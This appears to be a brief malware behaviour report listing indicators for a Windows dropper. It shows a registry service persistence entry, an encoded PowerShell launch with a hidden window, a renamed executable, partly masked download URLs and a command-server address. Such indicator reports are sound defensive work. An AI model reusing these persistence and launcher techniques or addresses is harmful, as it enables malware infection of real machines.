Technical Information
- [<HKLM>\System\CurrentControlSet\Services\embosstimeout] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\embosstimeout] 'ImagePath' = '"%WINDIR%\SysWOW64\embosstimeout.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABXAGoAZwByAHYAZgBqAGQAagA9ACcAVQBpAGcAdQBiAGkAbABiAGYAbABhACcAOwAkAEUAdwB5AHAAbQBtAHYAaQBhAGYAZAB0AGMAIAA9ACAAJwA2ADIANAAnADsAJABHAGkAcgB5AGEAZABuAHkAagBqAHoAPQAnAEMAcgB2AHQAcABqAHgAcgA...
- %HOMEPATH%\624.exe
- from %HOMEPATH%\624.exe to %WINDIR%\syswow64\embosstimeout.exe
- http://ac####y.seongon.com/wp-content/4h2x11317/
- http://18#.##3.113.67:443/prep/sess/ via 18#.#73.113.67
- DNS ASK ac####y.seongon.com
- '%HOMEPATH%\624.exe'
- '%WINDIR%\syswow64\embosstimeout.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABXAGoAZwByAHYAZgBqAGQAagA9ACcAVQBpAGcAdQBiAGkAbABiAGYAbABhACcAOwAkAEUAdwB5AHAAbQBtAHYAaQBhAGYAZAB0AGMAIAA9ACAAJwA2ADIANAAnADsAJABHAGkAcgB5AGEAZABuAHkAagBqAHoAPQAnAEMAcgB2AHQAcABqAHgAcgA...' (with hidden window)